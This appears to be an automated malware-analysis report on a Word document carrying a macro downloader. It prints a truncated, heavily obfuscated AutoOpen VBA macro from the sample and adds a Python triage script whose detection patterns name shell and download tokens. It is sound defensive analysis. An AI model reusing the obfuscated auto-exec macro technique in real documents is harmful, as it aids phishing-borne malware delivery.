Verdict: MALICIOUS
Risk Score: 222

Malware Insights

MITRE ATT&CK:
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1566.001 Phishing: Spearphishing Attachment
The sample is a malicious Office document carrying a VBA macro with an AutoOpen subroutine, so the code runs as soon as the document is opened with macros enabled. Heuristics flag a GetObject call, which returns a COM automation object (a WMI or shell object, for example) and is a common way to spawn a process or fetch a payload without an obvious Shell() call. The ClamAV detection name Doc.Downloader.Valyria-6595163-0 suggests the macro's purpose is to download and execute a secondary payload, consistent with the Spearphishing Attachment initial access vector. The extracted source is heavily padded with junk statements (Rnd, Log, Exp, Fix, InStr, Val, Debug.Print) and builds its strings one character at a time through IIf() calls guarded by arithmetic identities, so the actual download logic is not readable in the preview without deobfuscation. Note also that the legacy WordBasic finding's wording ("no modern VBA project was recovered") is inconsistent with the macros.bas recovered below; treat that finding as weak supplementary evidence rather than a separate capability.
Heuristics (7)

- ClamAV: Doc.Downloader.Valyria-6595163-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Valyria-6595163-0.
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code.
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro.
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call.
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This URL is the DrawingML XML namespace identifier that ordinary Office files carry; it is not a network indicator and should not be blocked or hunted on.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 80835 bytes | e4da2e35cb68d2bdfbbf1761b8adcacc21f6e544832491abbeed5e4548ee5ba5 |

Preview script: first 1,000 lines of the extracted macros.bas (the preview is cut off mid-line)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub SygoxoFerAZeRywEjuquLy()
UQyKUVOluCUpIgy = InStr("siwExunvAvAae", "siwExunvAvAaesiwExunvAvAae")
Dim zUziaeVOJIbihEHiCRuXOX
zUziaeVOJIbihEHiCRuXOX = Rnd(113)
If zUziaeVOJIbihEHiCRuXOX > 37230 Then
zUziaeVOJIbihEHiCRuXOX = Exp(3)
End If
Dim hyRaTAmOTEC
Dim BesUSamuinaZUNEdYdU
BesUSamuinaZUNEdYdU = Log(9)
BesUSamuinaZUNEdYdU = BesUSamuinaZUNEdYdU + Log(10)
wEkIVuryVUhEwiKeF = InStr("wOFUvULINuQA", "wOFUvULINuQAwOFUvULINuQA")
hyRaTAmOTEC = Rnd(123)
If hyRaTAmOTEC > 62798 Then
hyRaTAmOTEC = Exp(3)
Debug.Print "QijOJyBYtAcuiiMeMyKYgu"
End If
BubOWUMUFInugMIgYiExug = Val("12083.5") & "ShObAPYCiHiVfACiMaV"
kIHtuJeGUiuXUZUfyC = 61602
Dim ocisUXiCOPi
ocisUXiCOPi = Log(9)
ocisUXiCOPi = ocisUXiCOPi + Log(12)
Dim WADuNAGOgogodyZuWAKoN
For WADuNAGOgogodyZuWAKoN = 9 To 13
Dim LipYFyjyJYaiSEBOdADAT
LipYFyjyJYaiSEBOdADAT = Fix(52671)
Next
End Sub
Sub AutoOpen()
cijUQuGEzYke = Val("77819.8") & "JiwEcazEKkaso"
nAbOCKoHozEgEHeDUqAz = InStr("zYLuXiwAHEgyNADUganEw", "zYLuXiwAHEgyNADUganEwzYLuXiwAHEgyNADUganEw")
On Error Resume Next
Dim syBuGIpEMyluHU
For syBuGIpEMyluHU = 3 To 10
Dim nOtASoilOv
nOtASoilOv = Fix(41982)
Next
Dim qyqOVeRyfeV
qyqOVeRyfeV = Rnd(122)
Dim DaJAconYDacywEQa
DaJAconYDacywEQa = Log(6)
DaJAconYDacywEQa = DaJAconYDacywEQa + Log(10)
Debug.Print "aJaTQAiag"
If qyqOVeRyfeV > 64535 Then
xItAQigYsASYCOPyvYwiMu = Val("37527.5") & "aiFUmEZuDiOquzArega"
Dim nomOBYXaRaS
For nomOBYXaRaS = 3 To 10
Dim dXUhUlAGUSIaySodYtogumI
dXUhUlAGUSIaySodYtogumI = Fix(7954)
Next
qyqOVeRyfeV = Exp(2)
Debug.Print "FYmaMyjiDEQOVyk"
End If
Dim QIQaHIJeiELYlEg
QIQaHIJeiELYlEg = Log(6)
QIQaHIJeiELYlEg = QIQaHIJeiELYlEg + Log(10)
Dim safibyVAbymIgahywoi
safibyVAbymIgahywoi = Log(3)
safibyVAbymIgahywoi = safibyVAbymIgahywoi + Log(12)
KeTEjibyQEb = ""
Dim aibbpYqycuw
aibbpYqycuw = Log(10)
aibbpYqycuw = aibbpYqycuw + Log(12)
TAafENYpafOjeqyXEaa = InStr("MZoBelEbOmIPyN", "MZoBelEbOmIPyNMZoBelEbOmIPyN")
Dim KUcIgUxakyXOzIFiyROTIla
hYIrItEMAfixYP = Val("57402.5") & "lEhukyEbuKEviMAwyba"
KUcIgUxakyXOzIFiyROTIla = Log(5)
Dim PuHijiDyRYmigAxUROW
PuHijiDyRYmigAxUROW = Rnd(128)
If PuHijiDyRYmigAxUROW > 71603 Then
PuHijiDyRYmigAxUROW = Exp(8)
End If
Dim BavUcAQUGETaByjEM
BavUcAQUGETaByjEM = Rnd(109)
If BavUcAQUGETaByjEM > 52698 Then
BavUcAQUGETaByjEM = Exp(9)
End If
KUcIgUxakyXOzIFiyROTIla = KUcIgUxakyXOzIFiyROTIla + Log(11)
Dim wiMEPEmiJOPaBeGYS
wiMEPEmiJOPaBeGYS = Rnd(103)
If wiMEPEmiJOPaBeGYS > 84597 Then
wiMEPEmiJOPaBeGYS = Exp(3)
End If
iSIdIJoxiVE = InStr("GatuxapelUhErYDIH", "GatuxapelUhErYDIHGatuxapelUhErYDIH")
JiCYoioFupaJaCi = Val("41175.7") & "aimOtootIkajeHydYzo"
Dim iaVaJeRUMaCIw
iaVaJeRUMaCIw = Log(1)
iaVaJeRUMaCIw = iaVaJeRUMaCIw + Log(10)
Dim LYOlOTIlomamemU
For LYOlOTIlomamemU = 10 To 10
Dim kAgjAfOsuLiN
kAgjAfOsuLiN = Fix(42859)
Next
Dim ChqUhaxYNeWecUnYaib
For ChqUhaxYNeWecUnYaib = 8 To 13
Dim DebAcuCivonYjelYj
DebAcuCivonYjelYj = Fix(21505)
Next
guveiozAnitXIHir = Val("77387.2") & "toaiwEmETAHyXAiYFu"
KeTEjibyQEb = KeTEjibyQEb + IIf((35 + 70) = 105, "s", "fwrBr")
Dim KGsAkeWAvaf
For KGsAkeWAvaf = 6 To 13
Dim mUfYvYbOnwygoiOpoKUtUa
mUfYvYbOnwygoiOpoKUtUa = Rnd(109)
If mUfYvYbOnwygoiOpoKUtUa > 55064 Then
mUfYvYbOnwygoiOpoKUtUa = Exp(9)
End If
Dim qiZENEBaNopOLEXEnBuGyo
COWiXyXimynygXUZO = Val("64571.6") & "HYbyFosoCyqIkyCFip"
DIvYQywADeCaSy = InStr("mAToQUzUpoDTeRAyDIx", "mAToQUzUpoDTeRAyDIxmAToQUzUpoDTeRAyDIx")
qiZENEBaNopOLEXEnBuGyo = Fix(79105)
Next
VorUWYrIbAfoDK = Val("96563.10") & "VYXyvAVunIrYgYPozuPIS"
beEBiMiMUmeGNO = 29980
Debug.Print "vinAtUvAfeOBE"
Dim sOMUpeVUtFiquDeRYJeGum
sOMUpeVUtFiquDeRYJeGum = Rnd(122)
If sOMUpeVUtFiquDeRYJeGum > 59252 Th
... (truncated)
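The preview above shows the two things a triage script has to cope with in this sample: an auto-exec entry point sitting next to an object-execution token (the combination the OLE_VBA_AUTOOPEN, OLE_VBA_GETOBJ and OLE_VBA_PCODE_AUTOEXEC_EXEC heuristics key on), and strings assembled one character at a time through `IIf((a op b) = c, "x", "junk")` appends (line `KeTEjibyQEb = KeTEjibyQEb + IIf((35 + 70) = 105, "s", "fwrBr")`). The following Python script is an added example, not the analyzer's own code and not a reproduction of macros.bas: it scans VBA source for auto-exec and execution tokens, measures how much of the file is junk padding, and resolves the IIf chains into the literal each variable accumulates. `SAMPLE_VBA` is a constructed imitation of the preview's style; its identifiers, the token lists and the assembled WMI moniker are assumptions for illustration.

```python
"""Static triage of an extracted VBA macro.

Added example; not the analyzer's code. SAMPLE_VBA is a constructed
imitation of the preview's obfuscation style (junk Rnd/Log/Exp/Fix lines,
one-character IIf appends), not the real macros.bas.
"""
import json
import re

# Constructed sample. Identifiers are made up; the IIf chain spells a
# WMI moniker so the GetObject call at the end has something to bind to.
SAMPLE_VBA = r'''
Attribute VB_Name = "ThisDocument"
Private Sub SygoxoFerAZeRywEjuquLy()
    zUziaeVOJIbihEHiCRuXOX = Rnd(113)
    If zUziaeVOJIbihEHiCRuXOX > 37230 Then
        zUziaeVOJIbihEHiCRuXOX = Exp(3)
    End If
    BesUSamuinaZUNEdYdU = Log(9) + Log(10)
End Sub
Sub AutoOpen()
    On Error Resume Next
    nOtASoilOv = Fix(41982)
    KeTEjibyQEb = ""
    KeTEjibyQEb = KeTEjibyQEb + IIf((35 + 70) = 105, "w", "fwrBr")
    qyqOVeRyfeV = Rnd(122)
    KeTEjibyQEb = KeTEjibyQEb + IIf((12 * 3) = 36, "i", "QzQ")
    KeTEjibyQEb = KeTEjibyQEb + IIf((90 - 1) = 89, "n", "abc")
    Debug.Print "aJaTQAiag"
    KeTEjibyQEb = KeTEjibyQEb + IIf((2 + 2) = 5, "bogus", "m")
    KeTEjibyQEb = KeTEjibyQEb + IIf((7 * 7) = 49, "g", "xx")
    DaJAconYDacywEQa = Log(6) + Log(10)
    KeTEjibyQEb = KeTEjibyQEb + IIf((100 - 1) = 98, "zz", "m")
    KeTEjibyQEb = KeTEjibyQEb + IIf((3 + 4) = 7, "t", "yy")
    KeTEjibyQEb = KeTEjibyQEb + IIf((8 * 2) = 16, "s", "uu")
    KeTEjibyQEb = KeTEjibyQEb + IIf((1 + 1) = 3, "vv", ":")
    Set oSvc = GetObject(KeTEjibyQEb)
End Sub
'''

# Entry points Word/Excel run without user interaction (assumed list).
AUTOEXEC_RE = re.compile(
    r"\b(?:Sub|Function)\s+(AutoOpen|Auto_Open|AutoExec|AutoClose|"
    r"Document_Open|Document_Close|Workbook_Open)\b", re.I)
# Object-creation / launch / download tokens (assumed list; longer
# alternatives first so WScript.Shell is not counted twice as Shell).
EXEC_RE = re.compile(
    r"\b(GetObject|CreateObject|WScript\.Shell|Shell|ShellExecute|"
    r"URLDownloadToFile|XMLHTTP|ADODB\.Stream)\b", re.I)
# Statements that do no work: the padding seen throughout the preview.
JUNK_RE = re.compile(r"\b(?:Rnd|Log|Exp|Fix|InStr|Val|Debug\.Print)\b")
# v = v + IIf(...)   (VBA '+' and '&' both concatenate strings here)
APPEND_RE = re.compile(r"^\s*(\w+)\s*=\s*\1\s*[+&]\s*(IIf\(.*\))\s*$")
# IIf((a op b) = c, "when true", "when false") with integer literals only
IIF_RE = re.compile(
    r'IIf\(\s*\((\d+)\s*([+\-*])\s*(\d+)\)\s*=\s*(\d+)\s*,'
    r'\s*"([^"]*)"\s*,\s*"([^"]*)"\s*\)')


def find_tokens(src):
    """Return (auto-exec entry points, execution tokens) present in src."""
    autos = sorted({m.group(1) for m in AUTOEXEC_RE.finditer(src)})
    execs = sorted({m.group(1) for m in EXEC_RE.finditer(src)})
    return autos, execs


def junk_ratio(src):
    """Share of non-blank lines that are arithmetic/string padding."""
    lines = [ln for ln in src.splitlines() if ln.strip()]
    junk = sum(1 for ln in lines if JUNK_RE.search(ln))
    return junk / len(lines) if lines else 0.0


def _resolve_iif(m):
    """Pick the IIf branch that the arithmetic condition selects."""
    a, op, b, rhs, on_true, on_false = m.groups()
    a, b, rhs = int(a), int(b), int(rhs)
    value = {"+": a + b, "-": a - b, "*": a * b}[op]
    return on_true if value == rhs else on_false


def recover_strings(src):
    """Follow every `v = v + IIf(...)` chain; return {v: assembled text}."""
    acc = {}
    for line in src.splitlines():
        m = APPEND_RE.match(line)
        if not m:
            continue
        var, expr = m.group(1), m.group(2)
        piece = IIF_RE.match(expr)
        if piece is None:  # some other IIf shape: leave it unresolved
            continue
        acc[var] = acc.get(var, "") + _resolve_iif(piece)
    return acc


def triage(src):
    """Combine the checks into one report dict."""
    autos, execs = find_tokens(src)
    return {
        "autoexec": autos,
        "exec_tokens": execs,
        "on_error_resume_next": bool(
            re.search(r"On\s+Error\s+Resume\s+Next", src, re.I)),
        "junk_ratio": round(junk_ratio(src), 2),
        "recovered_strings": recover_strings(src),
        # auto-exec + execution token is the pairing the p-code rule keys on
        "verdict": "suspicious" if autos and execs else "needs-review",
    }


if __name__ == "__main__":
    print(json.dumps(triage(SAMPLE_VBA), indent=2))
```

Running the script prints a JSON summary with the entry point, the GetObject token, the junk ratio and the string the IIf chain assembles. The resolver only handles the integer-arithmetic IIf shape seen in the preview; nested conditions, function calls inside the condition or Chr()-based building stay unresolved, which is where olevba's --deobf pass or a VBA emulator such as ViperMonkey takes over. Because the real macros.bas is 80835 bytes of this padding, the junk ratio alone is a useful first signal that the visible source is not the logic worth reading.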